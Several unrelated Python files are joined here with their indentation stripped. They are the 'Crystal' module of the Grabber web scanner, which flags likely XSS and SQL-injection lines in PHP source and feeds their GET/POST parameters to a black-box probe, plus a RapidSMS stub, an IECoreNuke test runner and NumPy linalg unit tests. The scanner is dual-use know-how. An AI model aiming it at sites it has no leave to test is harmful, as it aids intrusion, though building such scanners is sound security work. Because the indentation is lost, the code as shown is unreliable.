if shortName not in crystalDatabase:
crystalDatabase[shortName] = {}
if vulnName not in crystalDatabase[shortName]:
crystalDatabase[shortName][vulnName] = {}
if str(lineNumber) not in crystalDatabase[shortName][vulnName]:
crystalDatabase[shortName][vulnName][str(lineNumber)] = l
detectPattern = False
inLined = False
vulnName = ""
if l.count(crystalCheckStart) > 0 and not inZone:
b1 = l.find(crystalCheckStart)
inZone = True
# same line for start and end ?
if l.count(crystalCheckEnd) > 0:
b2 = l.find(crystalCheckStart)
if b1 < b2:
inZone = False
position = l.lower().find(pattern.lower())
if b1 < position and position < b2:
detectPattern = True
inLined = True
elif inZone:
# is there any pattern around the corner ?
for modules in crystalPatterns:
for p in crystalPatterns[modules]:
p = p.lower()
l = l.lower()
# The folowing code is stupid!
# I have to change the algorithm for the __AND__ parsing...
if '__AND__' in p:
listPatterns = p.split('__AND__')
isIn = True
for patton in listPatterns:
if patton not in l:
isIn = isIn and False
if isIn:
detectPattern = True
vulnName = modules
a=0
else:
# test if the simple pattern is in the line
if p in l:
detectPattern = True
vulnName = modules
if l.count(crystalCheckEnd) > 0:
inZone = False
except UnicodeDecodeError:
continue
return True
def buildDatabase():
"""
Read the analzed files (indirectly with the crystalStorage.replace('current','analyzed') )
And look for the patterns
"""
listOut = []
for file in crystalStorage:
fileOut = os.path.abspath(os.path.join('./', file.replace('current', 'analyzed')))
if not isPatternInFile(fileOut):
print "Error with the file [%s]" % file
def createStructure():
"""
Create the structure in the ./local directory
"""
try:
os.mkdir("local/crystal/")
except OSError,e :
a=0
try:
os.mkdir("local/crystal/current")
except OSError,e :
a=0
try:
os.mkdir("local/crystal/analyzed")
except OSError,e :
a=0
"""
def realLineNumberReverse(fileName, codeStr):
print fileName, codeStr
try:
fN = os.path.abspath(os.path.join('./local/crystal/current/', fileName))
file = open(fN, 'r')
lineNumber = 0
for a in file.readlines():
lineNumber += 1
if codeStr in a:
print a
file.close()
return lineNumber
file.close()
except IOError,e:
print e
return 0
return 0
"""
def generateReport_1():
"""
Create a first report like:
* Developer report:
# using XSLT...
<site>
<file name="index.php">
<vulnerability line="9">xss</vulnerability>
<vulnerability line="25">sql</vulnerability>
</file>
...
</site>
* Security report:
<site>
<vulnerability name="xss">
<file name="index.php" line="9" />
...
</vulnerabilty>
<vulnerability name="sql">
<file name="index.php" line="25" />
</vulnerabilty>
</site>
"""
plop = open('results/crystal_SecurityReport_Grabber.xml','w')
plop.write("<crystal>\n")
plop.write("<site>\n")
plop.write("<!-- The line numbers are from the files in the 'analyzed' directory -->\n")
for file in crystalDatabase:
plop.write("\t<file name='%s'>\n" % file)
for vuln in crystalDatabase[file]:
for line in crystalDatabase[file][vuln]:
# lineNumber = realLineNumberReverse(file,crystalDatabase[file][vuln][line])
localVuln = vuln
if localVuln in vulnToDescritiveNames:
localVuln = vulnToDescritiveNames[localVuln]
plop.write("\t\t<vulnerability name='%s' line='%s' >%s</vulnerability>\n" % (localVuln, line, htmlencode(crystalDatabase[file][vuln][line])))
plop.write("\t</file>\n")
plop.write("</site>\n")
plop.write("</crystal>\n")
plop.close()
def buildUrlKey(file):
fileName = file.replace('\\','/') # on windows...
keyUrl = crystalUrl
if keyUrl[len(keyUrl)-1] != '/' and fileName[0] != '/':
keyUrl += '/'
keyUrl += fileName
return keyUrl
reParamPOST = re.compile(r'(.*)\$_POST\[(.+)\](.*)',re.I)
reParamGET = re.compile(r'(.*)\$_GET\[(.+)\](.*)' ,re.I)
def getSimpleParamFromCode_GET(code):
"""
Using the regular expression above, try to get some parameters name
"""
params = [] # we can have multiple params...
code = code.replace("'",'');
code = code.replace('"','');
if code.lower().count('get') > 0:
# try to match the $_GET
if reParamGET.match(code):
out = reParamGET.search(code)
params.append(out.group(2))
params.append(getSimpleParamFromCode_GET(out.group(3)))
params = flatten(params)
return params
def getSimpleParamFromCode_POST(code):
"""
Using the regular expression above, try to get some parameters name
"""
params = [] # we can have multiple params...
code = code.replace("'",'');
code = code.replace('"','');
if code.lower().count('post') > 0:
# try to match the $_GET
if reParamPOST.match(code):
out = reParamPOST.search(code)
params.append(out.group(2))
params.append(getSimpleParamFromCode_POST(out.group(3)))
params = flatten(params)
return params
def createClassicalDatabase(vulnsType, localCrystalDB):
"""
From the crystalDatabase, generate the same database as in Spider
This is generated for calling the differents modules
ClassicalDB = { url : { 'GET' : { param : value } } }
"""
classicalDB = {}
for file in localCrystalDB:
# build the URL
keyUrl = buildUrlKey(file)
if keyUrl not in classicalDB:
classicalDB[keyUrl] = {'GET' : {}, 'POST' : {}}
for vuln in localCrystalDB[file]:
# only get the kind of vulnerability we want
if vuln != vulnsType:
continue
for line in localCrystalDB[file][vuln]:
code = localCrystalDB[file][vuln][line]
# try to extract some data...
params_GET = getSimpleParamFromCode_GET (code)
params_POST = getSimpleParamFromCode_POST(code)
if len(params_GET) > 0:
for p in params_GET:
lG = classicalDB[keyUrl]['GET']
if p not in classicalDB[keyUrl]['GET']:
lG = dict_add(lG,{p:''})
classicalDB[keyUrl]['GET'] = lG
if len(params_POST) > 0:
for p in params_POST:
lP = classicalDB[keyUrl]['POST']
if p not in classicalDB[keyUrl]['POST']:
lP = dict_add(lP,{p:''})
classicalDB[keyUrl]['POST'] = lP
return classicalDB
def retrieveVulnList():
vulnList = []
for file in crystalDatabase:
for vuln in crystalDatabase[file]:
if vuln not in vulnList:
vulnList.append(vuln)
return vulnList
def process(urlGlobal, localDB, attack_list):
"""
Crystal Module entry point
"""
print "Crystal Module Start"
try:
f = open("crystal.conf.xml", 'r')
f.close()
except IOError:
print "The crystal module needs the 'crystal.conf.xml' configuration file."
sys.exit(1)
parser = make_parser()
crystal_handler = CrystalConfHandler()
# Tell the parser to use our handler
parser.setContentHandler(crystal_handler)
try:
parser.parse("crystal.conf.xml")
except KeyError, e:
print e
sys.exit(1)
#---------- White box testing
createStructure()
generateListOfFiles()
buildDatabase()
print "Build first report: List of vulneratilities and places in the code"
generateReport_1()
#---------- Start the Black Box testing
# need to create a classical database like, so losing information
# but for a type of vulnerability
listVulns = retrieveVulnList()
for vulns in listVulns:
localDatabase = createClassicalDatabase(vulns, crystalDatabase)
setDatabase(localDatabase)
print "inProcess Crystal DB = ", localDatabase
# print vulns, database
# Call the Black Box Module
print "Scan for ", vulns
investigate(crystalUrl, vulns)
print "Crystal Module Stop"
|
import rapidsms
class App(rapidsms.app.App):
'''Do nothing. This app is for django integration only and
has no sms functionality. This file and class exist only
so the router does not print an error messsage.'''
#TODO find a more sensible way of allowing non-sms apps
pass
|
import unittest
import IECore
import sys
sys.path.append( "test/IECoreNuke" )
from KnobAccessorsTest import *
from FnAxisTest import *
from StringUtilTest import *
from KnobConvertersTest import *
from ParameterisedHolderTest import ParameterisedHolderTest
from ObjectKnobTest import ObjectKnobTest
from OpHolderTest import OpHolderTest
if IECore.withPNG() :
from PNGReaderTest import PNGReaderTest
unittest.TestProgram(
testRunner = unittest.TextTestRunner(
stream = IECore.CompoundStream(
[
sys.stderr,
open( "test/IECoreNuke/resultsPython.txt", "w" )
]
),
verbosity = 2
)
)
|
""" Test functions for linalg module
"""
from __future__ import division, absolute_import, print_function
import os
import sys
import itertools
import traceback
import numpy as np
from numpy import array, single, double, csingle, cdouble, dot, identity
from numpy import multiply, atleast_2d, inf, asarray, matrix
from numpy import linalg
from numpy.linalg import matrix_power, norm, matrix_rank, multi_dot
from numpy.linalg.linalg import _multi_dot_matrix_chain_order
from numpy.testing import (
assert_, assert_equal, assert_raises, assert_array_equal,
assert_almost_equal, assert_allclose, run_module_suite,
dec
)
def ifthen(a, b):
return not a or b
def imply(a, b):
return not a or b
old_assert_almost_equal = assert_almost_equal
def assert_almost_equal(a, b, **kw):
if asarray(a).dtype.type in (single, csingle):
decimal = 6
else:
decimal = 12
old_assert_almost_equal(a, b, decimal=decimal, **kw)
def get_real_dtype(dtype):
return {single: single, double: double,
csingle: single, cdouble: double}[dtype]
def get_complex_dtype(dtype):
return {single: csingle, double: cdouble,
csingle: csingle, cdouble: cdouble}[dtype]
def get_rtol(dtype):
# Choose a safe rtol
if dtype in (single, csingle):
return 1e-5
else:
return 1e-11
class LinalgCase(object):
def __init__(self, name, a, b, exception_cls=None):
assert isinstance(name, str)
self.name = name
self.a = a
self.b = b
self.exception_cls = exception_cls
def check(self, do):
if self.exception_cls is None:
do(self.a, self.b)
else:
assert_raises(self.exception_cls, do, self.a, self.b)
def __repr__(self):
return "<LinalgCase: %s>" % (self.name,)
np.random.seed(1234)
SQUARE_CASES = [
LinalgCase("single",
array([[1., 2.], [3., 4.]], dtype=single),
array([2., 1.], dtype=single)),
LinalgCase("double",
array([[1., 2.], [3., 4.]], dtype=double),
array([2., 1.], dtype=double)),
LinalgCase("double_2",
array([[1., 2.], [3., 4.]], dtype=double),
array([[2., 1., 4.], [3., 4., 6.]], dtype=double)),
LinalgCase("csingle",
array([[1.+2j, 2+3j], [3+4j, 4+5j]], dtype=csingle),
array([2.+1j, 1.+2j], dtype=csingle)),
LinalgCase("cdouble",
array([[1.+2j, 2+3j], [3+4j, 4+5j]], dtype=cdouble),
array([2.+1j, 1.+2j], dtype=cdouble)),
LinalgCase("cdouble_2",
array([[1.+2j, 2+3j], [3+4j, 4+5j]], dtype=cdouble),
array([[2.+1j, 1.+2j, 1+3j], [1-2j, 1-3j, 1-6j]], dtype=cdouble)),
LinalgCase("empty",
atleast_2d(array([], dtype = double)),
atleast_2d(array([], dtype = double)),
linalg.LinAlgError),
LinalgCase("8x8",
np.random.rand(8, 8),
np.random.rand(8)),
LinalgCase("1x1",
np.random.rand(1, 1),
np.random.rand(1)),
LinalgCase("nonarray",
[[1, 2], [3, 4]],
[2, 1]),
LinalgCase("matrix_b_only",
array([[1., 2.], [3., 4.]]),
matrix([2., 1.]).T),
LinalgCase("matrix_a_and_b",
matrix([[1., 2.], [3., 4.]]),
matrix([2., 1.]).T),
]
NONSQUARE_CASES = [
LinalgCase("single_nsq_1",
array([[1., 2., 3.], [3., 4., 6.]], dtype=single),
array([2., 1.], dtype=single)),
LinalgCase("single_nsq_2",
array([[1., 2.], [3., 4.], [5., 6.]], dtype=single),
array([2., 1., 3.], dtype=single)),
LinalgCase("double_nsq_1",
array([[1., 2., 3.], [3., 4., 6.]], dtype=double),
array([2., 1.], dtype=double)),
LinalgCase("double_nsq_2",
array([[1., 2.], [3., 4.], [5., 6.]], dtype=double),
array([2., 1., 3.], dtype=double)),
LinalgCase("csingle_nsq_1",
array([[1.+1j, 2.+2j, 3.-3j], [3.-5j, 4.+9j, 6.+2j]], dtype=csingle),
array([2.+1j, 1.+2j], dtype=csingle)),
LinalgCase("csingle_nsq_2",
array([[1.+1j, 2.+2j], [3.-3j, 4.-9j], [5.-4j, 6.+8j]], dtype=csingle),
array([2.+1j, 1.+2j, 3.-3j], dtype=csingle)),
LinalgCase("cdouble_nsq_1",
array([[1.+1j, 2.+2j, 3.-3j], [3.-5j, 4.+9j, 6.+2j]], dtype=cdouble),
array([2.+1j, 1.+2j], dtype=cdouble)),
LinalgCase("cdouble_nsq_2",
array([[1.+1j, 2.+2j], [3.-3j, 4.-9j], [5.-4j, 6.+8j]], dtype=cdouble),
array([2.+1j, 1.+2j, 3.-3j], dtype=cdouble)),
LinalgCase("cdouble_nsq_1_2",
array([[1.+1j, 2.+2j, 3.-3j], [3.-5j, 4.+9j, 6.+2j]], dtype=cdouble),
array([[2.+1j, 1.+2j], [1-1j, 2-2j]], dtype=cdouble)),
LinalgCase("cdouble_nsq_2_2",
array([[1.+1j, 2.+2j], [3.-3j, 4.-9j], [5.-4j, 6.+8j]], dtype=cdouble),
array([[2.+1j, 1.+2j], [1-1j, 2-2j], [1-1j, 2-2j]], dtype=cdouble)),
LinalgCase("8x11",
np.random.rand(8, 11),
np.random.rand(11)),
LinalgCase("1x5",
np.random.rand(1, 5),
np.random.rand(5)),
LinalgCase("5x1",
np.random.rand(5, 1),
np.random.rand(1)),
]
HERMITIAN_CASES = [
LinalgCase("hsingle",
array([[1., 2.], [2., 1.]], dtype=single),
None),
LinalgCase("hdouble",
array([[1., 2.], [2., 1.]], dtype=double),
None),
LinalgCase("hcsingle",
array([[1., 2+3j], [2-3j, 1]], dtype=csingle),
None),
LinalgCase("hcdouble",
array([[1., 2+3j], [2-3j, 1]], dtype=cdouble),
None),
LinalgCase("hempty",
atleast_2d(array([], dtype = double)),
None,
linalg.LinAlgError),
LinalgCase("hnonarray",
[[1, 2], [2, 1]],
None),
LinalgCase("matrix_b_only",
array([[1., 2.], [2., 1.]]),
None),
LinalgCase("hmatrix_a_and_b",
matrix([[1., 2.], [2., 1.]]),
None),
LinalgCase("hmatrix_1x1",
np.random.rand(1, 1),
None),
]
GENERALIZED_SQUARE_CASES = []
GENERALIZED_NONSQUARE_CASES = []
GENERALIZED_HERMITIAN_CASES = []
for tgt, src in ((GENERALIZED_SQUARE_CASES, SQUARE_CASES),
(GENERALIZED_NONSQUARE_CASES, NONSQUARE_CASES),
(GENERALIZED_HERMITIAN_CASES, HERMITIAN_CASES)):
for case in src:
if not isinstance(case.a, np.ndarray):
continue
a = np.array([case.a, 2*case.a, 3*case.a])
if case.b is None:
b = None
else:
b = np.array([case.b, 7*case.b, 6*case.b])
new_case = LinalgCase(case.name + "_tile3", a, b,
case.exception_cls)
tgt.append(new_case)
a = np.array([case.a]*2*3).reshape((3, 2) + case.a.shape)
if case.b is None:
b = None
else:
b = np.array([case.b]*2*3).reshape((3, 2) + case.b.shape)
new_case = LinalgCase(case.name + "_tile213", a, b,
case.exception_cls)
tgt.append(new_case)
def _stride_comb_iter(x):
"""
Generate cartesian product of strides for all axes
"""
if not isinstance(x, np.ndarray):
yield x, "nop"
return
stride_set = [(1,)]*x.ndim
stride_set[-1] = (1, 3, -4)
if x.ndim > 1:
stride_set[-2] = (1, 3, -4)
if x.ndim > 2:
stride_set[-3] = (1, -4)
for repeats in itertools.product(*tuple(stride_set)):
new_shape = [abs(a*b) for a, b in zip(x.shape, repeats)]
slices = tuple([slice(None, None, repeat) for repeat in repeats])
# new array with different strides, but same data
xi = np.empty(new_shape, dtype=x.dtype)
xi.view(np.uint32).fill(0xdeadbeef)
xi = xi[slices]
xi[...] = x
xi = xi.view(x.__class__)
assert np.all(xi == x)
yield xi, "stride_" + "_".join(["%+d" % j for j in repeats])
# generate also zero strides if possible
if x.ndim >= 1 and x.shape[-1] == 1:
s = list(x.strides)
s[-1] = 0
xi = np.lib.stride_tricks.as_strided(x, strides=s)
yield xi, "stride_xxx_0"
if x.ndim >= 2 and x.shape[-2] == 1:
s = list(x.strides)
s[-2] = 0
xi = np.lib.stride_tricks.as_strided(x, strides=s)
yield xi, "stride_xxx_0_x"
if x.ndim >= 2 and x.shape[:-2] == (1, 1):
s = list(x.strides)
s[-1] = 0
s[-2] = 0
xi = np.lib.stride_tricks.as_strided(x, strides=s)
yield xi, "stride_xxx_0_0"
for src in (SQUARE_CASES,
NONSQUARE_CASES,
HERMITIAN_CASES,
GENERALIZED_SQUARE_CASES,
GENERALIZED_NONSQUARE_CASES,
GENERALIZED_HERMITIAN_CASES):
new_cases = []
for case in src:
for a, a_tag in _stride_comb_iter(case.a):
for b, b_tag in _stride_comb_iter(case.b):
new_case = LinalgCase(case.name + "_" + a_tag + "_" + b_tag, a, b,
exception_cls=case.exception_cls)
new_cases.append(new_case)
src.extend(new_cases)
def _check_cases(func, cases):
for case in cases:
try:
case.check(func)
except Exception:
msg = "In test case: %r\n\n" % case
msg += traceback.format_exc()
raise AssertionError(msg)
class LinalgTestCase(object):
def test_sq_cases(self):
_check_cases(self.do, SQUARE_CASES)
class LinalgNonsquareTestCase(object):
def test_sq_cases(self):
_check_cases(self.do, NONSQUARE_CASES)
class LinalgGeneralizedTestCase(object):
@dec.slow
def test_generalized_sq_cases(self):
_check_cases(self.do, GENERALIZED_SQUARE_CASES)
class LinalgGeneralizedNonsquareTestCase(object):
@dec.slow
def test_generalized_nonsq_cases(self):
_check_cases(self.do, GENERALIZED_NONSQUARE_CASES)
class HermitianTestCase(object):
def test_herm_cases(self):
_check_cases(self.do, HERMITIAN_CASES)
class HermitianGeneralizedTestCase(object):
@dec.slow
def test_generalized_herm_cases(self):
_check_cases(self.do, GENERALIZED_HERMITIAN_CASES)
def dot_generalized(a, b):
a = asarray(a)
if a.ndim >= 3:
if a.ndim == b.ndim:
# matrix x matrix
new_shape = a.shape[:-1] + b.shape[-1:]
elif a.ndim == b.ndim + 1:
# matrix x vector
new_shape = a.shape[:-1]
else:
raise ValueError("Not implemented...")
r = np.empty(new_shape, dtype=np.common_type(a, b))
for c in itertools.product(*map(range, a.shape[:-2])):
r[c] = dot(a[c], b[c])
return r
else:
return dot(a, b)
def identity_like_generalized(a):
a = asarray(a)
if a.ndim >= 3:
r = np.empty(a.shape, dtype=a.dtype)
for c in itertools.product(*map(range, a.shape[:-2])):
r[c] = identity(a.shape[-2])
return r
else:
return identity(a.shape[0])
class TestSolve(LinalgTestCase, LinalgGeneralizedTestCase):
def do(self, a, b):
x = linalg.solve(a, b)
assert_almost_equal(b, dot_generalized(a, x))
assert_(imply(isinstance(b, matrix), isinstance(x, matrix)))
def test_types(self):
def check(dtype):
x = np.array([[1, 0.5], [0.5, 1]], dtype=dtype)
assert_equal(linalg.solve(x, x).dtype, dtype)
for dtype in [single, double, csingle, cdouble]:
yield check, dtype
def test_0_size(self):
class ArraySubclass(np.ndarray):
pass
# Test system of 0x0 matrices
a = np.arange(8).reshape(2, 2, 2)
b = np.arange(6).reshape(1, 2, 3).view(ArraySubclass)
expected = linalg.solve(a, b)[:, 0:0,:]
result = linalg.solve(a[:, 0:0, 0:0], b[:, 0:0,:])
assert_array_equal(result, expected)
assert_(isinstance(result, ArraySubclass))
# Test errors for non-square and only b's dimension being 0
assert_raises(linalg.LinAlgError, linalg.solve, a[:, 0:0, 0:1], b)
assert_raises(ValueError, linalg.solve, a, b[:, 0:0,:])
# Test broadcasting error
b = np.arange(6).reshape(1, 3, 2) # broadcasting error
assert_raises(ValueError, linalg.solve, a, b)
assert_raises(ValueError, linalg.solve, a[0:0], b[0:0])
# Test zero "single equations" with 0x0 matrices.
b = np.arange(2).reshape(1, 2).view(ArraySubclass)
expected = linalg.solve(a, b)[:, 0:0]
result = linalg.solve(a[:, 0:0, 0:0], b[:, 0:0])
assert_array_equal(result, expected)
assert_(isinstance(result, ArraySubclass))
b = np.arange(3).reshape(1, 3)
assert_raises(ValueError, linalg.solve, a, b)
assert_raises(ValueError, linalg.solve, a[0:0], b[0:0])
assert_raises(ValueError, linalg.solve, a[:, 0:0, 0:0], b)
def test_0_size_k(self):
# test zero multiple equation (K=0) case.
class ArraySubclass(np.ndarray):
pass
a = np.arange(4).reshape(1, 2, 2)
b = np.arange(6).reshape(3, 2, 1).view(ArraySubclass)
expected = linalg.solve(a, b)[:,:, 0:0]
result = linalg.solve(a, b[:,:, 0:0])
assert_array_equal(result, expected)
assert_(isinstance(result, ArraySubclass))
# test both zero.
expected = linalg.solve(a, b)[:, 0:0, 0:0]
result = linalg.solve(a[:, 0:0, 0:0], b[:,0:0, 0:0])
assert_array_equal(result, expected)
assert_(isinstance(result, ArraySubclass))
class TestInv(LinalgTestCase, LinalgGeneralizedTestCase):
def do(self, a, b):
a_inv = linalg.inv(a)
assert_almost_equal(dot_generalized(a, a_inv),
identity_like_generalized(a))
assert_(imply(isinstance(a, matrix), isinstance(a_inv, matrix)))
def test_types(self):
def check(dtype):
x = np.array([[1, 0.5], [0.5, 1]], dtype=dtype)
assert_equal(linalg.inv(x).dtype, dtype)
for dtype in [single, double, csingle, cdouble]:
yield check, dtype
def test_0_size(self):
# Check that all kinds of 0-sized arrays work
class ArraySubclass(np.ndarray):
pass
a = np.zeros((0, 1, 1), dtype=np.int_).view(ArraySubclass)
res = linalg.inv(a)
assert_(res.dtype.type is np.float64)
assert_equal(a.shape, res.shape)
assert_(isinstance(a, ArraySubclass))
a = np.zeros((0, 0), dtype=np.complex64).view(ArraySubclass)
res = linalg.inv(a)
assert_(res.dtype.type is np.complex64)
assert_equal(a.shape, res.shape)
class TestEigvals(LinalgTestCase, LinalgGeneralizedTestCase):
def do(self, a, b):
ev = linalg.eigvals(a)
evalues, evectors = linalg.eig(a)
assert_almost_equal(ev, evalues)
def test_types(self):
def check(dtype):
x = np.array([[1, 0.5], [0.5, 1]], dtype=dtype)
assert_equal(linalg.eigvals(x).dtype, dtype)
x = np.array([[1, 0.5], [-1, 1]], dtype=dtype)
assert_equal(linalg.eigvals(x).dtype, get_complex_dtype(dtype))
for dtype in [single, double, csingle, cdouble]:
yield check, dtype
class TestEig(LinalgTestCase, LinalgGeneralizedTestCase):
def do(self, a, b):
evalues, evectors = linalg.eig(a)
assert_allclose(dot_generalized(a, evectors),
np.asarray(evectors) * np.asarray(evalues)[...,None,:],
rtol=get_rtol(evalues.dtype))
assert_(imply(isinstance(a, matrix), isinstance(evectors, matrix)))
def test_types(self):
def check(dtype):
x = np.array([[1, 0.5], [0.5, 1]], dtype=dtype)
w, v = np.linalg.eig(x)
assert_equal(w.dtype, dtype)
assert_equal(v.dtype, dtype)
x = np.array([[1, 0.5], [-1, 1]], dtype=dtype)
w, v = np.linalg.eig(x)
assert_equal(w.dtype, get_complex_dtype(dtype))
assert_equal(v.dtype, get_complex_dtype(dtype))
for dtype in [single, double, csingle, cdouble]:
yield check, dtype
class TestSVD(LinalgTestCase, LinalgGeneralizedTestCase):
def do(self, a, b):
u, s, vt = linalg.svd(a, 0)
assert_allclose(a, dot_generalized(np.asarray(u) * np.asarray(s)[...,None,:],
np.asarray(vt)),
rtol=get_rtol(u.dtype))
assert_(imply(isinstance(a, matrix), isinstance(u, matrix)))
assert_(imply(isinstance(a, matrix), isinstance(vt, matrix)))
def test_types(self):
def check(dtype):
x = np.array([[1, 0.5], [0.5, 1]], dtype=dtype)
u, s, vh = linalg.svd(x)
assert_equal(u.dtype, dtype)
assert_equal(s.dtype, get_real_dtype(dtype))
assert_equal(vh.dtype, dtype)
s = linalg.svd(x, compute_uv=False)
assert_equal(s.dtype, get_real_dtype(dtype))
for dtype in [single, double, csingle, cdouble]:
yield check, dtype
class TestCondSVD(LinalgTestCase, LinalgGeneralizedTestCase):
def do(self, a, b):
c = asarray(a) # a might be a matrix
s = linalg.svd(c, compute_uv=False)
old_assert_almost_equal(s[0]/s[-1], linalg.cond(a), decimal=5)
class TestCond2(LinalgTestCase):
def do(self, a, b):
c = asarray(a) # a might be a matrix
s = linalg.svd(c, compute_uv=False)
old_assert_almost_equal(s[0]/s[-1], linalg.cond(a, 2), decimal=5)
class TestCondInf(object):
def test(self):
A = array([[1., 0, 0], [0, -2., 0], [0, 0, 3.]])
assert_almost_equal(linalg.cond(A, inf), 3.)
class TestPinv(LinalgTestCase):
def do(self, a, b):
a_ginv = linalg.pinv(a)
assert_almost_equal(dot(a, a_ginv), identity(asarray(a).shape[0]))
assert_(imply(isinstance(a, matrix), isinstance(a_ginv, matrix)))
class TestDet(LinalgTestCase, LinalgGeneralizedTestCase):
def do(self, a, b):
d = linalg.det(a)
(s, ld) = linalg.slogdet(a)
if asarray(a).dtype.type in (single, double):
ad = asarray(a).astype(double)
else:
ad = asarray(a).astype(cdouble)
ev = linalg.eigvals(ad)
assert_almost_equal(d, multiply.reduce(ev, axis=-1))
assert_almost_equal(s * np.exp(ld), multiply.reduce(ev, axis=-1))
s = np.atleast_1d(s)
ld = np.atleast_1d(ld)
m = (s != 0)
assert_almost_equal(np.abs(s[m]), 1)
assert_equal(ld[~m], -inf)
def test_zero(self):
assert_equal(linalg.det([[0.0]]), 0.0)
assert_equal(type(linalg.det([[0.0]])), double)
assert_equal(linalg.det([[0.0j]]), 0.0)
assert_equal(type(linalg.det([[0.0j]])), cdouble)
assert_equal(linalg.slogdet([[0.0]]), (0.0, -inf))
assert_equal(type(linalg.slogdet([[0.0]])[0]), double)
assert_equal(type(linalg.slogdet([[0.0]])[1]), double)
assert_equal(linalg.slogdet([[0.0j]]), (0.0j, -inf))
assert_equal(type(linalg.slogdet([[0.0j]])[0]), cdouble)
assert_equal(type(linalg.slogdet([[0.0j]])[1]), double)
def test_types(self):
def check(dtype):
x = np.array([[1, 0.5], [0.5, 1]], dtype=dtype)
assert_equal(np.linalg.det(x).dtype, dtype)
ph, s = np.linalg.slogdet(x)
assert_equal(s.dtype, get_real_dtype(dtype))
assert_equal(ph.dtype, dtype)
for dtype in [single, double, csingle, cdouble]:
yield check, dtype
class TestLstsq(LinalgTestCase, LinalgNonsquareTestCase):
def do(self, a, b):
arr = np.asarray(a)
m, n = arr.shape
u, s, vt = linalg.svd(a, 0)
x, residuals, rank, sv = linalg.lstsq(a, b)
if m <= n:
assert_almost_equal(b, dot(a, x))
assert_equal(rank, m)
else:
assert_equal(rank, n)
assert_almost_equal(sv, sv.__array_wrap__(s))
if rank == n and m > n:
expect_resids = (np.asarray(abs(np.dot(a, x) - b))**2).sum(axis=0)
expect_resids = np.asarray(expect_resids)
if len(np.asarray(b).shape) == 1:
expect_resids.shape = (1,)
assert_equal(residuals.shape, expect_resids.shape)
else:
expect_resids = np.array([]).view(type(x))
assert_almost_equal(residuals, expect_resids)
assert_(np.issubdtype(residuals.dtype, np.floating))
assert_(imply(isinstance(b, matrix), isinstance(x, matrix)))
assert_(imply(isinstance(b, matrix), isinstance(residuals, matrix)))
class TestMatrixPower(object):
R90 = array([[0, 1], [-1, 0]])
Arb22 = array([[4, -7], [-2, 10]])
noninv = array([[1, 0], [0, 0]])
arbfloat = array([[0.1, 3.2], [1.2, 0.7]])
large = identity(10)
t = large[1,:].copy()
large[1,:] = large[0,:]
large[0,:] = t
def test_large_power(self):
assert_equal(matrix_power(self.R90, 2**100+2**10+2**5+1), self.R90)
def test_large_power_trailing_zero(self):
assert_equal(matrix_power(self.R90, 2**100+2**10+2**5), identity(2))
def testip_zero(self):
def tz(M):
mz = matrix_power(M, 0)
assert_equal(mz, identity(M.shape[0]))
assert_equal(mz.dtype, M.dtype)
for M in [self.Arb22, self.arbfloat, self.large]:
yield tz, M
def testip_one(self):
def tz(M):
mz = matrix_power(M, 1)
assert_equal(mz, M)
assert_equal(mz.dtype, M.dtype)
for M in [self.Arb22, self.arbfloat, self.large]:
yield tz, M
def testip_two(self):
def tz(M):
mz = matrix_power(M, 2)
assert_equal(mz, dot(M, M))
assert_equal(mz.dtype, M.dtype)
for M in [self.Arb22, self.arbfloat, self.large]:
yield tz, M
def testip_invert(self):
def tz(M):
mz = matrix_power(M, -1)
assert_almost_equal(identity(M.shape[0]), dot(mz, M))
for M in [self.R90, self.Arb22, self.arbfloat, self.large]:
yield tz, M
def test_invert_noninvertible(self):
import numpy.linalg
assert_raises(numpy.linalg.linalg.LinAlgError,
lambda: matrix_power(self.noninv, -1))
class TestBoolPower(object):
def test_square(self):
A = array([[True, False], [True, True]])
assert_equal(matrix_power(A, 2), A)
class TestEigvalsh(HermitianTestCase, HermitianGeneralizedTestCase):
def do(self, a, b):
# note that eigenvalue arrays returned by eig must be sorted since
# their order isn't guaranteed.
ev = linalg.eigvalsh(a, 'L')
evalues, evectors = linalg.eig(a)
evalues.sort(axis=-1)
assert_allclose(ev, evalues, rtol=get_rtol(ev.dtype))
ev2 = linalg.eigvalsh(a, 'U')
assert_allclose(ev2, evalues, rtol=get_rtol(ev.dtype))
def test_types(self):
def check(dtype):
x = np.array([[1, 0.5], [0.5, 1]], dtype=dtype)
w = np.linalg.eigvalsh(x)
assert_equal(w.dtype, get_real_dtype(dtype))
for dtype in [single, double, csingle, cdouble]:
yield check, dtype
def test_invalid(self):
x = np.array([[1, 0.5], [0.5, 1]], dtype=np.float32)
assert_raises(ValueError, np.linalg.eigvalsh, x, UPLO="lrong")
assert_raises(ValueError, np.linalg.eigvalsh, x, "lower")
assert_raises(ValueError, np.linalg.eigvalsh, x, "upper")
def test_UPLO(self):
Klo = np.array([[0, 0],[1, 0]], dtype=np.double)
Kup = np.array([[0, 1],[0, 0]], dtype=np.double)
tgt = np.array([-1, 1], dtype=np.double)
rtol = get_rtol(np.double)
# Check default is 'L'
w = np.linalg.eigvalsh(Klo)
assert_allclose(w, tgt, rtol=rtol)
# Check 'L'
w = np.linalg.eigvalsh(Klo, UPLO='L')
assert_allclose(w, tgt, rtol=rtol)
# Check 'l'
w = np.linalg.eigvalsh(Klo, UPLO='l')
assert_allclose(w, tgt, rtol=rtol)
# Check 'U'
w = np.linalg.eigvalsh(Kup, UPLO='U')
assert_allclose(w, tgt, rtol=rtol)
# Check 'u'
w = np.linalg.eigvalsh(Kup, UPLO='u')
assert_allclose(w, tgt, rtol=rtol)
class TestEigh(HermitianTestCase, HermitianGeneralizedTestCase):
def do(self, a, b):
# note that eigenvalue arrays returned by eig must be sorted since
# their order isn't guaranteed.
ev, evc = linalg.eigh(a)
evalues, evectors = linalg.eig(a)
evalues.sort(axis=-1)
assert_almost_equal(ev, evalues)
assert_allclose(dot_generalized(a, evc),
np.asarray(ev)[...,None,:] * np.asarray(evc),
rtol=get_rtol(ev.dtype))
ev2, evc2 = linalg.eigh(a, 'U')
assert_almost_equal(ev2, evalues)
assert_allclose(dot_generalized(a, evc2),
np.asarray(ev2)[...,None,:] * np.asarray(evc2),
rtol=get_rtol(ev.dtype), err_msg=repr(a))
def test_types(self):
def check(dtype):
x = np.array([[1, 0.5], [0.5, 1]], dtype=dtype)
w, v = np.linalg.eigh(x)
assert_equal(w.dtype, get_real_dtype(dtype))
assert_equal(v.dtype, dtype)
for dtype in [single, double, csingle, cdouble]:
yield check, dtype
def test_invalid(self):
x = np.array([[1, 0.5], [0.5, 1]], dtype=np.float32)
assert_raises(ValueError, np.linalg.eigh, x, UPLO="lrong")
assert_raises(ValueError, np.linalg.eigh, x, "lower")
